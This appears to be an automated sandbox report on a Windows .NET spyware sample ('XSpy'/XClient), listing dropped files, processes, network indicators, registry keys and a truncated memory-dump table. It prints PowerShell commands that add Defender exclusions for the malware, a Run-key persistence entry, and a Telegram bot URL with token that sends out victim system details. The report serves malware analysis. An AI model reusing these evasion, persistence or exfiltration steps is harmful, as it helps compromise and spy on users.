Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
z0LTqIdZ4A.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Roaming\XClient.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2srbw2cv.5rt.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4zll2czj.ujz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_amf3b1ux.vy5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cqaufyng.uzk.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fltctdoq.e5x.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hmvaauh3.w50.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kdtwnbtm.gf3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nkhvfo0p.d2f.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_obeios0a.opb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4v4c2dp.ur4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q55b0cc4.axz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s30ooyxh.he1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sxmya4mo.qa4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ucmct3tt.4iz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ullhplw1.bnh.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ztu1i5bc.tyl.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Apr 20 20:41:00
2024, mtime=Sat Apr 20 20:41:00 2024, atime=Sat Apr 20 20:41:00 2024, length=169984, window=hide
|
dropped
|
There are 11 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\z0LTqIdZ4A.exe
|
"C:\Users\user\Desktop\z0LTqIdZ4A.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\z0LTqIdZ4A.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'z0LTqIdZ4A.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
|
||
C:\Users\user\AppData\Roaming\XClient.exe
|
"C:\Users\user\AppData\Roaming\XClient.exe"
|
||
C:\Users\user\AppData\Roaming\XClient.exe
|
"C:\Users\user\AppData\Roaming\XClient.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 1 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
93.123.39.225
|
|||
https://api.telegram.org/bot6769459273:AAE8rusUI57P-Uj11j60b70AidMpGMPPq1E/sendMessage?chat_id=6862736136&text=%E2%98%A0%20%5BXSPY%20-%20@RUSSAGENT%20%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AFF6BC8E90A1001FE1454%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%206Z46G%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XSpy%20By%20EagleSpy
|
149.154.167.220
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://api.telegram.org/bot6769459273:AAE8rusUI57P-Uj11j60b70AidMpGMPPq1E/sendMessage?chat_id=68627
|
unknown
|
||
https://api.telegram.org
|
unknown
|
||
http://www.microsoft.t
|
unknown
|
||
https://api.telegram.org/bot
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://www.microsoft.co
|
unknown
|
||
https://api.telegrP
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
https://ion=v4.5n
|
unknown
|
||
http://api.telegram.org
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://schemas.microsoft.co
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
There are 13 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
api.telegram.org
|
149.154.167.220
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
93.123.39.225
|
unknown
|
Bulgaria
|
||
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
XClient
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
2C93000
|
trusted library allocation
|
page read and write
|
||
2C4D000
|
trusted library allocation
|
page read and write
|
||
8E2000
|
unkown
|
page readonly
|
||
12BE1000
|
trusted library allocation
|
page read and write
|
||
1EFD207B000
|
trusted library allocation
|
page read and write
|
||
1F701893000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
1F701898000
|
trusted library allocation
|
page read and write
|
||
1F76D94D000
|
heap
|
page read and write
|
||
7DF4C58D0000
|
trusted library allocation
|
page execute and read and write
|
||
990000
|
heap
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
2C68000
|
trusted library allocation
|
page read and write
|
||
12D3000
|
heap
|
page read and write
|
||
121C000
|
heap
|
page read and write
|
||
1243000
|
heap
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
17B4B1A9000
|
heap
|
page read and write
|
||
7FFD9B846000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
1F701E2A000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB90000
|
trusted library allocation
|
page execute and read and write
|
||
1D16C000
|
stack
|
page read and write
|
||
1F710010000
|
trusted library allocation
|
page read and write
|
||
D30000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAD2000
|
trusted library allocation
|
page read and write
|
||
1EFDA5B0000
|
heap
|
page read and write
|
||
1F701126000
|
trusted library allocation
|
page read and write
|
||
D4E3E8C000
|
stack
|
page read and write
|
||
7FFD9B82C000
|
trusted library allocation
|
page execute and read and write
|
||
17B33A52000
|
trusted library allocation
|
page read and write
|
||
17B30FC5000
|
heap
|
page read and write
|
||
1BEC3000
|
stack
|
page read and write
|
||
1F76B6F0000
|
trusted library allocation
|
page read and write
|
||
17B3437F000
|
trusted library allocation
|
page read and write
|
||
7FFD9B958000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB6C000
|
trusted library allocation
|
page read and write
|
||
1EFC0260000
|
heap
|
page read and write
|
||
7FFD9B79B000
|
trusted library allocation
|
page execute and read and write
|
||
1460000
|
heap
|
page read and write
|
||
1EFC2D07000
|
trusted library allocation
|
page read and write
|
||
1EFC2D10000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
17B32FBD000
|
trusted library allocation
|
page read and write
|
||
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
1F76D9AE000
|
heap
|
page read and write
|
||
7FFD9BAA3000
|
trusted library allocation
|
page read and write
|
||
2B653CE000
|
stack
|
page read and write
|
||
7DF46A5F0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BB70000
|
trusted library allocation
|
page read and write
|
||
1F701097000
|
trusted library allocation
|
page read and write
|
||
1EFC3B71000
|
trusted library allocation
|
page read and write
|
||
17B42B21000
|
trusted library allocation
|
page read and write
|
||
DAF000
|
heap
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
1EFC36E5000
|
trusted library allocation
|
page read and write
|
||
7FFD9B82C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B962000
|
trusted library allocation
|
page read and write
|
||
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
17B4B097000
|
heap
|
page read and write
|
||
1DFB57AB000
|
trusted library allocation
|
page read and write
|
||
1BB8E000
|
stack
|
page read and write
|
||
1DFCCAB0000
|
heap
|
page execute and read and write
|
||
45ECCF8000
|
stack
|
page read and write
|
||
2C88000
|
trusted library allocation
|
page read and write
|
||
45EC97E000
|
stack
|
page read and write
|
||
7FFD9B82C000
|
trusted library allocation
|
page execute and read and write
|
||
1EFD1D91000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
1252000
|
heap
|
page read and write
|
||
7FFD9B846000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAE8000
|
trusted library allocation
|
page read and write
|
||
D60000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
1EFD2080000
|
trusted library allocation
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
820000
|
heap
|
page read and write
|
||
1F701165000
|
trusted library allocation
|
page read and write
|
||
C666FD000
|
stack
|
page read and write
|
||
7FFD9BB90000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
17B30F70000
|
trusted library allocation
|
page read and write
|
||
1F76D5E6000
|
heap
|
page read and write
|
||
2C8F000
|
trusted library allocation
|
page read and write
|
||
C664FE000
|
stack
|
page read and write
|
||
1570000
|
heap
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
17B34917000
|
trusted library allocation
|
page read and write
|
||
1DFB62FC000
|
trusted library allocation
|
page read and write
|
||
17B30F90000
|
trusted library allocation
|
page read and write
|
||
1EFC02DD000
|
heap
|
page read and write
|
||
7FFD9B773000
|
trusted library allocation
|
page execute and read and write
|
||
127C000
|
heap
|
page read and write
|
||
D4E3D8E000
|
stack
|
page read and write
|
||
1EFDA240000
|
heap
|
page execute and read and write
|
||
7FFD9BBCD000
|
trusted library allocation
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
2C9B000
|
trusted library allocation
|
page read and write
|
||
1DFCC831000
|
heap
|
page read and write
|
||
7FFD9B77D000
|
trusted library allocation
|
page execute and read and write
|
||
640000
|
heap
|
page read and write
|
||
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
7FFD9B92A000
|
trusted library allocation
|
page read and write
|
||
7FFD9B952000
|
trusted library allocation
|
page read and write
|
||
2E1E000
|
stack
|
page read and write
|
||
1DFCCAEC000
|
heap
|
page read and write
|
||
1DFC4501000
|
trusted library allocation
|
page read and write
|
||
1DFB5568000
|
trusted library allocation
|
page read and write
|
||
C6770C000
|
stack
|
page read and write
|
||
25AF000
|
trusted library allocation
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
2CAE000
|
trusted library allocation
|
page read and write
|
||
17B33A5B000
|
trusted library allocation
|
page read and write
|
||
1F70130C000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAD2000
|
trusted library allocation
|
page read and write
|
||
1F76D5E0000
|
heap
|
page read and write
|
||
1F700228000
|
trusted library allocation
|
page read and write
|
||
17B32D18000
|
trusted library allocation
|
page read and write
|
||
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
17B30D00000
|
heap
|
page read and write
|
||
D4E29FE000
|
stack
|
page read and write
|
||
D4E30BE000
|
stack
|
page read and write
|
||
7FFD9B890000
|
trusted library allocation
|
page execute and read and write
|
||
17B32820000
|
heap
|
page execute and read and write
|
||
1DFB4325000
|
heap
|
page read and write
|
||
2B6467F000
|
stack
|
page read and write
|
||
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B826000
|
trusted library allocation
|
page read and write
|
||
7FFD9B79D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
1F76CF70000
|
trusted library allocation
|
page read and write
|
||
2B6457E000
|
stack
|
page read and write
|
||
D4E2FB7000
|
stack
|
page read and write
|
||
45ECFBE000
|
stack
|
page read and write
|
||
1F701E06000
|
trusted library allocation
|
page read and write
|
||
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
1F710001000
|
trusted library allocation
|
page read and write
|
||
1F76DA82000
|
heap
|
page read and write
|
||
1EFC3BB6000
|
trusted library allocation
|
page read and write
|
||
1F76B6B0000
|
heap
|
page read and write
|
||
1DFC47BA000
|
trusted library allocation
|
page read and write
|
||
D8F000
|
heap
|
page read and write
|
||
7FFD9B93A000
|
trusted library allocation
|
page read and write
|
||
1EFC1B50000
|
heap
|
page read and write
|
||
1EFC0265000
|
heap
|
page read and write
|
||
45ECD3F000
|
stack
|
page read and write
|
||
45ECA7E000
|
stack
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
1F76DA94000
|
heap
|
page read and write
|
||
7FFD9B930000
|
trusted library allocation
|
page execute and read and write
|
||
10F0000
|
heap
|
page read and write
|
||
C66579000
|
stack
|
page read and write
|
||
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
2590000
|
heap
|
page execute and read and write
|
||
1DFC44D1000
|
trusted library allocation
|
page read and write
|
||
25B1000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB7E000
|
trusted library allocation
|
page read and write
|
||
1F76B4D1000
|
heap
|
page read and write
|
||
1F76D080000
|
heap
|
page read and write
|
||
540000
|
heap
|
page read and write
|
||
1C3DE000
|
stack
|
page read and write
|
||
1DFC44F1000
|
trusted library allocation
|
page read and write
|
||
A9F000
|
stack
|
page read and write
|
||
1EFC1CE0000
|
trusted library allocation
|
page read and write
|
||
E4D000
|
heap
|
page read and write
|
||
17B32AA0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B77D000
|
trusted library allocation
|
page execute and read and write
|
||
1EFC2CFF000
|
trusted library allocation
|
page read and write
|
||
1DFCCD50000
|
heap
|
page read and write
|
||
1EFC27E2000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
1DFB2860000
|
trusted library section
|
page read and write
|
||
1DFCC9A0000
|
heap
|
page read and write
|
||
1DFB2A70000
|
heap
|
page readonly
|
||
1EFDA2C5000
|
heap
|
page read and write
|
||
1DFB5896000
|
trusted library allocation
|
page read and write
|
||
1C632000
|
heap
|
page read and write
|
||
1EFC02C2000
|
heap
|
page read and write
|
||
1F7102F9000
|
trusted library allocation
|
page read and write
|
||
D4E303B000
|
stack
|
page read and write
|
||
1EFC2993000
|
trusted library allocation
|
page read and write
|
||
1430000
|
heap
|
page read and write
|
||
D63000
|
trusted library allocation
|
page read and write
|
||
7B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
2CBF000
|
trusted library allocation
|
page read and write
|
||
2B63DCF000
|
stack
|
page read and write
|
||
7FFD9B912000
|
trusted library allocation
|
page read and write
|
||
2E70000
|
heap
|
page read and write
|
||
17B4AEBE000
|
heap
|
page read and write
|
||
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BA93000
|
trusted library allocation
|
page read and write
|
||
1EFDA32C000
|
heap
|
page read and write
|
||
1EFC2E55000
|
trusted library allocation
|
page read and write
|
||
CF4000
|
stack
|
page read and write
|
||
12E88000
|
trusted library allocation
|
page read and write
|
||
1F76B4D9000
|
heap
|
page read and write
|
||
17B33A57000
|
trusted library allocation
|
page read and write
|
||
C669BE000
|
stack
|
page read and write
|
||
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
1DFCCC61000
|
heap
|
page read and write
|
||
17B3372D000
|
trusted library allocation
|
page read and write
|
||
1DFCCAD8000
|
heap
|
page read and write
|
||
7FFD9BAC4000
|
trusted library allocation
|
page read and write
|
||
1DFB57DE000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
1B8EB000
|
heap
|
page read and write
|
||
2B6427F000
|
stack
|
page read and write
|
||
1EFDA5E3000
|
heap
|
page read and write
|
||
1DFB44D1000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAC4000
|
trusted library allocation
|
page read and write
|
||
1EFC3BBB000
|
trusted library allocation
|
page read and write
|
||
7FFD9B763000
|
trusted library allocation
|
page execute and read and write
|
||
1EFC30D6000
|
trusted library allocation
|
page read and write
|
||
1DFB46FA000
|
trusted library allocation
|
page read and write
|
||
1F76B519000
|
heap
|
page read and write
|
||
7FFD9BADC000
|
trusted library allocation
|
page read and write
|
||
7FFD9B960000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BAD5000
|
trusted library allocation
|
page read and write
|
||
1CE6A000
|
stack
|
page read and write
|
||
14B0000
|
trusted library allocation
|
page read and write
|
||
1D06C000
|
stack
|
page read and write
|
||
C665FE000
|
stack
|
page read and write
|
||
2C5C000
|
trusted library allocation
|
page read and write
|
||
1DFCCC7A000
|
heap
|
page read and write
|
||
17B42B11000
|
trusted library allocation
|
page read and write
|
||
D4E297E000
|
stack
|
page read and write
|
||
1DFCCC21000
|
heap
|
page read and write
|
||
1F701215000
|
trusted library allocation
|
page read and write
|
||
C661DE000
|
stack
|
page read and write
|
||
17B30DC6000
|
heap
|
page read and write
|
||
7FFD9B7BC000
|
trusted library allocation
|
page execute and read and write
|
||
C66677000
|
stack
|
page read and write
|
||
1F76D941000
|
heap
|
page read and write
|
||
1F76D685000
|
heap
|
page read and write
|
||
1DFB50D8000
|
trusted library allocation
|
page read and write
|
||
7FFD9B911000
|
trusted library allocation
|
page read and write
|
||
1EFC1D91000
|
trusted library allocation
|
page read and write
|
||
1250000
|
heap
|
page read and write
|
||
1DFB44C0000
|
heap
|
page read and write
|
||
D4E3F0E000
|
stack
|
page read and write
|
||
1EFDA5F8000
|
heap
|
page read and write
|
||
1EFC0240000
|
heap
|
page read and write
|
||
C66A3E000
|
stack
|
page read and write
|
||
7FFD9B902000
|
trusted library allocation
|
page read and write
|
||
17B30FB0000
|
trusted library allocation
|
page read and write
|
||
1DFB5244000
|
trusted library allocation
|
page read and write
|
||
6A0000
|
heap
|
page read and write
|
||
1DFCCAE8000
|
heap
|
page read and write
|
||
1EFD2099000
|
trusted library allocation
|
page read and write
|
||
1EFDA4CC000
|
heap
|
page read and write
|
||
1F76CF30000
|
heap
|
page execute and read and write
|
||
7FFD9B794000
|
trusted library allocation
|
page read and write
|
||
17B4B0D3000
|
heap
|
page read and write
|
||
C6647E000
|
stack
|
page read and write
|
||
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B968000
|
trusted library allocation
|
page read and write
|
||
1B5C3000
|
heap
|
page read and write
|
||
1EFC0380000
|
heap
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
890000
|
heap
|
page read and write
|
||
7FFD9BB60000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAC8000
|
trusted library allocation
|
page read and write
|
||
1BD9E000
|
stack
|
page read and write
|
||
45ECE3A000
|
stack
|
page read and write
|
||
4F4000
|
stack
|
page read and write
|
||
1130000
|
heap
|
page read and write
|
||
1EFC35FD000
|
trusted library allocation
|
page read and write
|
||
1C639000
|
heap
|
page read and write
|
||
125A8000
|
trusted library allocation
|
page read and write
|
||
D4E3D0C000
|
stack
|
page read and write
|
||
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
2B6417E000
|
stack
|
page read and write
|
||
9C0000
|
heap
|
page read and write
|
||
12E81000
|
trusted library allocation
|
page read and write
|
||
7FFD9B930000
|
trusted library allocation
|
page execute and read and write
|
||
1DFB2888000
|
heap
|
page read and write
|
||
7FFD9B942000
|
trusted library allocation
|
page read and write
|
||
D4E2D7E000
|
stack
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
1DFB56AD000
|
trusted library allocation
|
page read and write
|
||
1F701787000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
25A1000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
1EFC2C2C000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAD9000
|
trusted library allocation
|
page read and write
|
||
7FFD9BADA000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
1EFC2F3D000
|
trusted library allocation
|
page read and write
|
||
1DFCC86C000
|
heap
|
page read and write
|
||
2B6524E000
|
stack
|
page read and write
|
||
1DFCCAD4000
|
heap
|
page read and write
|
||
1F7004CD000
|
trusted library allocation
|
page read and write
|
||
1DFB44C5000
|
heap
|
page read and write
|
||
1C5F5000
|
heap
|
page read and write
|
||
1F700C31000
|
trusted library allocation
|
page read and write
|
||
7FFD9B954000
|
trusted library allocation
|
page read and write
|
||
2B651CC000
|
stack
|
page read and write
|
||
1EFC1D30000
|
heap
|
page execute and read and write
|
||
1EFC1B90000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
1EFC2CFB000
|
trusted library allocation
|
page read and write
|
||
1F76D09F000
|
heap
|
page read and write
|
||
1F76D951000
|
heap
|
page read and write
|
||
7FFD9BAD4000
|
trusted library allocation
|
page read and write
|
||
1EFC1D70000
|
heap
|
page read and write
|
||
1DFB2A97000
|
heap
|
page execute and read and write
|
||
17B30D86000
|
heap
|
page read and write
|
||
2B645FE000
|
stack
|
page read and write
|
||
1DFCCAD0000
|
heap
|
page read and write
|
||
2E8C000
|
trusted library allocation
|
page read and write
|
||
F7F000
|
stack
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
1EFD1DC1000
|
trusted library allocation
|
page read and write
|
||
7FFD9B912000
|
trusted library allocation
|
page read and write
|
||
17B4B040000
|
heap
|
page read and write
|
||
1B720000
|
heap
|
page read and write
|
||
1F76D914000
|
heap
|
page read and write
|
||
7FFD9B92A000
|
trusted library allocation
|
page read and write
|
||
17B33A70000
|
trusted library allocation
|
page read and write
|
||
1DFC47BE000
|
trusted library allocation
|
page read and write
|
||
1B94E000
|
stack
|
page read and write
|
||
7FFD9B958000
|
trusted library allocation
|
page read and write
|
||
7FFD9B77D000
|
trusted library allocation
|
page execute and read and write
|
||
1DFB5E25000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
7FFD9B830000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B7DC000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B820000
|
trusted library allocation
|
page execute and read and write
|
||
1F701005000
|
trusted library allocation
|
page read and write
|
||
1F701252000
|
trusted library allocation
|
page read and write
|
||
2CF0000
|
trusted library allocation
|
page read and write
|
||
17B32826000
|
heap
|
page execute and read and write
|
||
9A0000
|
heap
|
page read and write
|
||
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
1F7011DC000
|
trusted library allocation
|
page read and write
|
||
7FFD9B930000
|
trusted library allocation
|
page execute and read and write
|
||
1F701389000
|
trusted library allocation
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
1F76B4ED000
|
heap
|
page read and write
|
||
45EDC07000
|
stack
|
page read and write
|
||
17B4B0FD000
|
heap
|
page read and write
|
||
2B643F9000
|
stack
|
page read and write
|
||
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
E33000
|
heap
|
page read and write
|
||
17B42DFA000
|
trusted library allocation
|
page read and write
|
||
1F700A52000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7BC000
|
trusted library allocation
|
page execute and read and write
|
||
1CC2E000
|
stack
|
page read and write
|
||
2CD2000
|
trusted library allocation
|
page read and write
|
||
45EC8FE000
|
stack
|
page read and write
|
||
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
1F76B710000
|
trusted library allocation
|
page read and write
|
||
17B4B140000
|
heap
|
page read and write
|
||
1EFC303C000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA33000
|
trusted library allocation
|
page read and write
|
||
1AC10000
|
trusted library allocation
|
page read and write
|
||
1EFC3518000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAE0000
